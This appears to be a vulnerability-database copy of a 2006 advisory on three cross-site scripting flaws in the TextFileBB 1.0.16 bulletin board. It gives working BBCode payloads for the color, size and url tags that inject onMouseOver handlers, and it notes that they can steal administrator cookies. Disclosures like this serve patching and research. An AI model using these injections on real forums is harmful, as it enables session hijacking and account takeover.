Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12484
HistoryApr 30, 2006 - 12:00 a.m.

TextFileBB 1.0.16 Multiple XSS

2006-04-3000:00:00
vulners.com
6
JSON

TextFileBB is a flat-file based bulletin board system written in PHP.

There are 3 different XSS vulnerabilities in this software at the moment, which I found about half an hour ago =D

Anyway, the XSS lies in these tags:
[color]
[size]
[url]

EXPLANATION:

Firstly, we'll explain [color].

[code][.color=#00'">0FFF] """xss [/color][/code]

Would give us:
[code]<font >0fff="" color="#000000"> """xss </font>[/code]

Therefore we can see that we actually are breaking the tag and that our last part (0FFF) is stripped (funnily enough I found this by typo.)

So, we need to do:

[code][.color=#00F"onMouseOver='alert(/xss/)' x="]h0n0[/color][/code]

As this would give us:
[code]<font onmouseover="alert(/xss/)" x="" color="#000000">h0n0</font>[/code]

We use the #00F to start the color (so that it IS parsed [attempted to be] by the parser), and break out of that with our quote - it'll be replaced with a space. The color will be left as #000000. I added the x="" attribute because I noticed it wouldn't render in IE for some wierd reason.

NEXT: [size].

This is basically the same as [color], but tad different.

[code][.size=7" OnMouseOver="alert(/xss/)]Clicky Here [/size][/code]
We break out of the size with the first quote, and then use our MouseOver - we do not close the MouseOver ourselves because the parser will enclose everything in "".
Turns into: (something like)

[code]<font size="7" onMouseOver="alert(/xss/)">Clicky Here</font>[/code]

LAST: [url].

I don't think the parser cares whether or not you include the http://, but I added it just as an example.

[code][.url=http://" OnMouseOver="alert(/xss/)]hmm[/url][/code]
Same as with [size], we break out of the href and then do not add a " to the end because the parser will do it for us.

USAGE:
TextFileBB stores user information in cookies, so you could steal the administrator's cookies and take over the board.

Credits: me =D

Shouts: digi7al64 - PrOtOn - Lockdown - WhiteAcid

Video @ http://dynxss.whiteacid.org/videos/TextFileBB_1.0.16-final.rar]http://dynxss.whiteacid.org/videos/TextFil....0.16-final.rar :: 8mb

JSON